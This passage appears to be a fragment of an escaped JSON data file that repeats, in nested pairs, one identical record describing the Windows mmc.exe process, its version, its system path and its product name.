params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating 